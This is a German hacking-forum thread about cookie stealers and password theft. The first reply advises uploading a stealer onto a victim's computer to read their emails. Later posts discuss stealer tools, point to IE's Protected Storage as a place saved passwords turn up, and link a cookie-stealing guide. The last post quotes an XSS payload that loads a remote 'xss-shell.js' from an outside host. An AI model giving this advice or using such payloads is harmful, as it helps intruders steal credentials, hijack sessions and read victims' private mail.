Cookies?

[stayla]

lade dir nen stealer upp denn auf dein vic und guck dann nen bishen in sein emails oder was du auch immer machen willst

[v0Dka.]

mal einer frage dazu... ich habe in einem anderem forum (nichts mit so sachen wie FH zu tun ) mein passwort vergessen.. Email recovery ist auf der seite verkackt.. (funktioniert nicht..)so nun frag ich mich ob ich noch irgendwie an mein passwort kommen kann ...

mit nem stealer versuch ich das ganze nochmal aber glaube eher weniger,dass das klappt weil das schon mitlerweile fast n monat her ist als ich mich mit meinem account dort ein bzw ausgeloggt hab..

Ist ein bisschen OT aber vielleicht kann mir einer auf die schnelle helfen

Lg,
v0Dka.

[j0.keR]

Schreib dem Admin eine mail , mit der email von der registration dass er dir dein pw zusenden//ändern soll und gut ist ich denke nicht das da noch einer was sagt
Falls du dein PW nicht im Browser gespeichert hast wirste es auch nicht "stealen" können ! Wenn du mitm IE Unterwegs bist, was ich nicht hoffe kannste ja mal im Protected Storage nachschauen manchmal findet man da auch was

[v0Dka.]

Schreib dem Admin eine mail , mit der email von der registration dass er dir dein pw zusenden//ändern soll und gut ist ich denke nicht das da noch einer was sagt
Falls du dein PW nicht im Browser gespeichert hast wirste es auch nicht "stealen" können ! Wenn du mitm IE Unterwegs bist, was ich nicht hoffe kannste ja mal im Protected Storage nachschauen manchmal findet man da auch was

Der haupt adminj kann passwörter nur ändern bzw links zuschicken..
und der ist immom nicht wirklich erreichbar..

der rest meldet sich nur schwach oder die die keine rechte haben..
und noch ein problem besteht darin ich bin mir nicht mehr wirklich sicher welche email ich verwendet habe..

Das passwort hatte ich lange zeit gesichert bis.. mein kollege meinte ich solle mal schauen auf seinem account weil sein englisch nicht so toll ist ..
Das mit dem beweisen dürfte kein problem sein da mich die admins alle kennen soweit hab manche in steam youtube icq msn geadded... also soweit kein problem nur leider wie bereits gesagt keine rückmeldung

PS.: hab grade mal nach stealern geschaut alles ur alt oder nur steam Phishing oder änhliches hab jetzt nicht grade lust neuen ftp zu erstellen usw..
oder nen istealer zu konfigurieren hab grade mein system so schön frei von "nicht schönen sachen"

[kalachnikov]

Der Cookie-Logger/Stealer ist dafür geschrieben worden um unter anderem durch eine XSS Lücke die Cookies etc. des Vice, der auf einen präparierten Link klickt, zu loggen, wie eX0duS ja schon teilweise beschrieben hat.

Leider kann ich meinen COokie-Lo0ger hier nicht bereit stellen, da ich grade im Ausland verweile und mein Rechner nun mal zu Hause schläft

Um euch aber trotzdem die Logik und den Prinzip eines solchen Logger aufzuzeigen, habe ich hier mal was gefunden, was evtl. helfen sollte.

Code:

http://www.all-nettools.com/forum/showthread.php?6811-Moonbat-s-Guide-to-Cookie-Stealing

einfach mal googeln :=)

[SFX]

ein "cookie-stealer" der in JavaScript realisiert wurde und für eine XSS Lücke gedacht ist ist hier einfach nur fehl im Platz und jeder der das nicht erkennt sollte XSS mal ganz schnell aus seiner "Skill List" löschen, dazu gehört mehr als nur "><script src="http://ueber-l0l-wut.com/xss-shell.js"></script>